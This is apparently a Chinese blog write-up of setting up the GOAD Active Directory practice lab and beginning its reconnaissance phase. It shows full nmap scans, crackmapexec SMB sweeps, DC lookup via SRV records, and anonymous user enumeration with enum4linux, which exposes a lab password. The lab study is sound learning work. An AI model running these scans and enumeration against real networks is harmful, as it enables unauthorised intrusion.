平时除了比赛基本上没有机会来接触一个完整的渗透场景,GOAD 是一个开源的渗透镜像,可以在自己的服务器上搭建。正好最近在宿舍里用老平台搭了一台自己的小型服务器,就准备搭一个来玩玩。
搭建靶场
虽然 GOAD 教程里的搭建靶场步骤比较简单,但是不可避免地会出现各种各样奇怪的错误,所以实际上搭的过程还是挺麻烦的。
经过快半个月的各种摧残折磨,我的建议是开一台虚拟机,用最原始的环境来配。
我使用的环境是:
- 服务器 PVE 8.4.0
- 系统版本 Windows Server 2025 Standard 24H2
- CPU i5-12400 虚拟机分配 6 个核心,模式 hosts 直通(不然 VT-X 用不了)
- RAM 24GB
- Disk 200GB
- Python 3.11
顺便一提,由于一些众所周知的原因,我的路由器上开了全局代理。
然后跟着他的步骤去搭环境,教程在这里 https://orange-cyberdefense.github.io/GOAD/installation/windows/。
我选择的是 virtualbox 作为 provider,vm 作为 provisioner,网段为默认网段 192.168.56.0/24 。
如果不出什么意外的话,等个几小时就能看到他安装成功:
由于 24G 是 GOAD 推荐的最低内存配置,实际上跑起来还是有点吃力的。我手动将每个虚拟机的内存减小了 1GB,最后实际内存占用在 22.5GB 左右。还是建议大家用 Linux 宿主机来跑,资源占用会相对小一点。
由于是在虚拟机里跑的,我们需要穿透一下内网,这里我直接用静态路由来实现。首先打开 Windows 服务器的 IP 转发功能,可以见 https://www.sjdhome.com/blog/post/ip-forward-on-windows/ 。
不知道为什么,GOAD 虚拟机静态 IP 中的网关没有设置,我们需要登录到虚拟机中并手动配置一下网关(用户名 vagrant 密码 vagrant),将其设置为 192.168.56.1。
然后在你的主机上以管理员权限执行:
route add 192.168.56.0 MASK 255.255.255.0 <你的服务器 IP>然后 ping 192.168.56.10 或者在浏览器中访问,如果有回应或者出现了 IIS 测试界面即为成功。
对于其它 IP 的虚拟机设置也是一样的。
架构
渗透的前言
终于可以开日了!
这篇文章同时也是学习域渗透的一个笔记,基于对原 WP 的复现。
我觉得原 WP 中一些因果关系写的不是很好,即为什么要执行这条命令,怎么判断某种情况下执行这条命令,所以会做一些适当的补充。
信息收集
最初肯定是要做一些信息收集的,但是要收集什么信息,用什么工具去收集呢?这节会做一个详细的介绍。
Nmap
其实我觉得最开始无脑跑的肯定是 nmap,这里就直接贴了:
$ nmap -Pn -p- -sC -sV -oA full_scan_goad 192.168.56.10-12,22-23Nmap scan report for sevenkingdoms.local (192.168.56.10)
Host is up (0.00099s latency).
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-10 04:54:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-09T17:31:00
|_Not valid after: 2026-05-09T17:31:00
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:57+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-09T17:31:00
|_Not valid after: 2026-05-09T17:31:00
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-09T17:31:00
|_Not valid after: 2026-05-09T17:31:00
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-09T17:31:00
|_Not valid after: 2026-05-09T17:31:00
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-08T16:26:22
|_Not valid after: 2025-11-07T16:26:22
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:04:20
|_Not valid after: 2028-05-07T08:04:20
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49705/tcp open msrpc Microsoft Windows RPC
49834/tcp open msrpc Microsoft Windows RPC
50931/tcp open msrpc Microsoft Windows RPC
Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-10T04:57:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and requiredNmap scan report for winterfell.north.sevenkingdoms.local (192.168.56.11)
Host is up (0.00095s latency).
Not shown: 65508 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-10 04:54:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-09T19:04:37
|_Not valid after: 2026-05-09T19:04:37
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:57+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-09T19:04:37
|_Not valid after: 2026-05-09T19:04:37
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-09T19:04:37
|_Not valid after: 2026-05-09T19:04:37
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-09T19:04:37
|_Not valid after: 2026-05-09T19:04:37
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-05-10T04:57:57+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-08T16:57:17
|_Not valid after: 2025-11-07T16:57:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:14:24
|_Not valid after: 2028-05-07T08:14:24
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
52840/tcp open msrpc Microsoft Windows RPC
64416/tcp open msrpc Microsoft Windows RPC
Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-10T04:57:37
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and requiredNmap scan report for essos.local (192.168.56.12)
Host is up (0.0010s latency).
Not shown: 65508 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-10 04:55:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:meereen.essos.local
| Not valid before: 2025-05-09T17:31:12
|_Not valid after: 2026-05-09T17:31:12
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ESSOS)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:meereen.essos.local
| Not valid before: 2025-05-09T17:31:12
|_Not valid after: 2026-05-09T17:31:12
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:meereen.essos.local
| Not valid before: 2025-05-09T17:31:12
|_Not valid after: 2026-05-09T17:31:12
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:meereen.essos.local
| Not valid before: 2025-05-09T17:31:12
|_Not valid after: 2026-05-09T17:31:12
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=meereen.essos.local
| Not valid before: 2025-05-08T16:25:49
|_Not valid after: 2025-11-07T16:25:49
|_ssl-date: 2025-05-10T04:57:57+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:28:24
|_Not valid after: 2028-05-07T08:28:24
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49718/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MEEREEN; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 46m41s, deviation: 2h20m05s, median: 0s
| smb2-time:
| date: 2025-05-10T04:57:38
|_ start_date: 2025-05-09T19:02:34
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: meereen
| NetBIOS computer name: MEEREEN\x00
| Domain name: essos.local
| Forest name: essos.local
| FQDN: meereen.essos.local
|_ System time: 2025-05-09T21:57:39-07:00Nmap scan report for castelblack.north.sevenkingdoms.local (192.168.56.22)
Host is up (0.00079s latency).
Not shown: 65516 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 192.168.56.22:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 192.168.56.22:1433:
| Target_Name: NORTH
| NetBIOS_Domain_Name: NORTH
| NetBIOS_Computer_Name: CASTELBLACK
| DNS_Domain_Name: north.sevenkingdoms.local
| DNS_Computer_Name: castelblack.north.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-09T18:59:40
|_Not valid after: 2055-05-09T18:59:40
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local
| Not valid before: 2025-05-08T17:12:38
|_Not valid after: 2025-11-07T17:12:38
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:39:34
|_Not valid after: 2028-05-07T08:39:34
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49752/tcp open msrpc Microsoft Windows RPC
49839/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-09T18:59:40
|_Not valid after: 2055-05-09T18:59:40
| ms-sql-info:
| 192.168.56.22:49839:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 49839
| ms-sql-ntlm-info:
| 192.168.56.22:49839:
| Target_Name: NORTH
| NetBIOS_Domain_Name: NORTH
| NetBIOS_Computer_Name: CASTELBLACK
| DNS_Domain_Name: north.sevenkingdoms.local
| DNS_Computer_Name: castelblack.north.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
|_ Product_Version: 10.0.17763
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-10T04:57:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not requiredNmap scan report for braavos.essos.local (192.168.56.23)
Host is up (0.00060s latency).
Not shown: 65516 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-05-10T05:10:05+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
| 192.168.56.23:1433:
| Target_Name: ESSOS
| NetBIOS_Domain_Name: ESSOS
| NetBIOS_Computer_Name: BRAAVOS
| DNS_Domain_Name: essos.local
| DNS_Computer_Name: braavos.essos.local
| DNS_Tree_Name: essos.local
|_ Product_Version: 10.0.14393
| ms-sql-info:
| 192.168.56.23:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-10T02:28:35
|_Not valid after: 2055-05-10T02:28:35
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: ESSOS
| NetBIOS_Domain_Name: ESSOS
| NetBIOS_Computer_Name: BRAAVOS
| DNS_Domain_Name: essos.local
| DNS_Computer_Name: braavos.essos.local
| DNS_Tree_Name: essos.local
| Product_Version: 10.0.14393
|_ System_Time: 2025-05-10T05:09:55+00:00
| ssl-cert: Subject: commonName=braavos.essos.local
| Not valid before: 2025-05-08T17:12:11
|_Not valid after: 2025-11-07T17:12:11
|_ssl-date: 2025-05-10T05:10:05+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-05-10T05:10:05+00:00; 0s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:56:38
|_Not valid after: 2028-05-07T08:56:38
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49721/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
49788/tcp open msrpc Microsoft Windows RPC
49791/tcp open msrpc Microsoft Windows RPC
49859/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.56.23:49859:
| Target_Name: ESSOS
| NetBIOS_Domain_Name: ESSOS
| NetBIOS_Computer_Name: BRAAVOS
| DNS_Domain_Name: essos.local
| DNS_Computer_Name: braavos.essos.local
| DNS_Tree_Name: essos.local
|_ Product_Version: 10.0.14393
|_ssl-date: 2025-05-10T05:10:05+00:00; 0s from scanner time.
| ms-sql-info:
| 192.168.56.23:49859:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 49859
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-10T02:28:35
|_Not valid after: 2055-05-10T02:28:35
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 41m59s, deviation: 2h12m48s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: braavos
| NetBIOS computer name: BRAAVOS\x00
| Domain name: essos.local
| Forest name: essos.local
| FQDN: braavos.essos.local
|_ System time: 2025-05-09T22:09:55-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-05-10T05:09:59
|_ start_date: 2025-05-10T02:28:16结果实在太多了,就先不进行分析了。
crackmapexec
关于 crackmapexec 工具的使用,可以前往[本人的笔记]()了解更多内容。
cme 工具使用 NetBIOS 协议进行探测,可以快速获得网段内机器信息。
为了确定网段内机子的总体概况,我们先对网段进行一个快速的扫描:
crackmapexec smb 192.168.56.1/24
可以看到网段内总共有三个域:
- north.sevenkingdoms.local (2 ip)
- .22 CASTELBLACK (windows server 2019) (signing false)
- .11 WINTERFELL (windows server 2019)
- sevenkingdoms.local (1 ip)
- .10 KINGSLANDING (windows server 2019)
- essos.local (2 ip)
- .33 BRAAVOS (windows server 2016) (signing false)
- .12 MEEREEN (windows server 2019)
每个域都对应着一个 DC,并且安装 DC 时 SMB Signing 是默认为 True 的,所以 DC 为 WINTERFELL、KINGSLANDING、MEEREEN。
收集域控制器 IP
我们可以使用 nslookup 命令来查找域控 IP。
SRV 记录是 DNS 服务器的数据库中支持的一种资源记录的类型,它记录了哪台计算机提供了哪个服务这么一个简单的信息。
SRV 记录:一般是为 Microsoft 的活动目录设置时的应用。DNS 可以独立于活动目录,但是活动目录必须有 DNS 的帮助才能工作。为了活动目录能够正常的工作,DNS 服务器必须支持服务定位(SRV)资源记录,资源记录把服务名字映射为提供服务的服务器名字。活动目录客户和域控制器使用 SRV 资源记录决定域控制器的 IP 地址。
对任意一个开启 DNS 服务(比如 192.168.56.10 )主机查询 SRV 记录,
nslookup -type=srv _ldap._tcp.dc.msdcs.${domain} 192.168.56.10
可以看到对于一些结果返回是在 Authoritative answers can be found from 下,说明这个 Domain 的控制器是这台主机。
设置 /etc/hosts
# /etc/hosts
192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12 essos.local meereen.essos.local meereen
192.168.56.22 castelblack.north.sevenkingdoms.local castelblack
192.168.56.23 braavos.essos.local braavos原 WP 在这里还配置了 kerberos,不过我觉得应该放在后面进行配置。
获取可用用户
利用匿名会话列举
我们可以先尝试一下 DC 是否支持匿名会话,如果允许的话就可以直接获取到域下的所有用户。
这里应该是经过尝试,最终找到 WINTERFELL 是允许匿名会话的。
CME
crackmapexec smb 192.168.56.11 --users
同时,利用匿名会话,我们也可以得到 DC 的密码策略:
crackmapexec smb 192.168.56.11 --pass-pol
enum4linux
除了 cme,也可以用 enum4linux 来获取 DC 上的信息。
enum4linux 192.168.56.11可以看到他的信息非常全面:
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 12 22:41:26 2025
=========================================( Target Information )=========================================
Target ........... 192.168.56.11
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.11 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 192.168.56.11 )===============================
Looking up status of 192.168.56.11
No reply from 192.168.56.11
===================================( Session Check on 192.168.56.11 )===================================
[+] Server 192.168.56.11 allows sessions using username '', password ''
================================( Getting domain SID for 192.168.56.11 )================================
Domain Name: NORTH
Domain Sid: S-1-5-21-1143549074-3139567753-3545395897
[+] Host is part of a domain (not a workgroup)
==================================( OS information on 192.168.56.11 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.56.11 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 192.168.56.11 )=======================================
index: 0x18b2 RID: 0x456 acb: 0x00000210 Account: arya.stark Name: (null) Desc: Arya Stark
index: 0x18bd RID: 0x45b acb: 0x00010210 Account: brandon.stark Name: (null) Desc: Brandon Stark
index: 0x16fa RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x18c1 RID: 0x45d acb: 0x00000210 Account: hodor Name: (null) Desc: Brainless Giant
index: 0x18c7 RID: 0x460 acb: 0x00000210 Account: jeor.mormont Name: (null) Desc: Jeor Mormont
index: 0x18c3 RID: 0x45e acb: 0x00040210 Account: jon.snow Name: (null) Desc: Jon Snow
index: 0x18bf RID: 0x45c acb: 0x00000210 Account: rickon.stark Name: (null) Desc: Rickon Stark
index: 0x18c6 RID: 0x45f acb: 0x00000210 Account: samwell.tarly Name: (null) Desc: Samwell Tarly (Password : Heartsbane)
index: 0x18bb RID: 0x45a acb: 0x00002210 Account: sansa.stark Name: (null) Desc: Sansa Stark
index: 0x18c8 RID: 0x461 acb: 0x00000210 Account: sql_svc Name: (null) Desc: sql service
user:[Guest] rid:[0x1f5]
user:[arya.stark] rid:[0x456]
user:[sansa.stark] rid:[0x45a]
user:[brandon.stark] rid:[0x45b]
user:[rickon.stark] rid:[0x45c]
user:[hodor] rid:[0x45d]
user:[jon.snow] rid:[0x45e]
user:[samwell.tarly] rid:[0x45f]
user:[jeor.mormont] rid:[0x460]
user:[sql_svc] rid:[0x461]
=================================( Share Enumeration on 192.168.56.11 )=================================
do_connect: Connection to 192.168.56.11 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.56.11
===========================( Password Policy Information for 192.168.56.11 )===========================
[+] Attaching to 192.168.56.11 using a NULL share
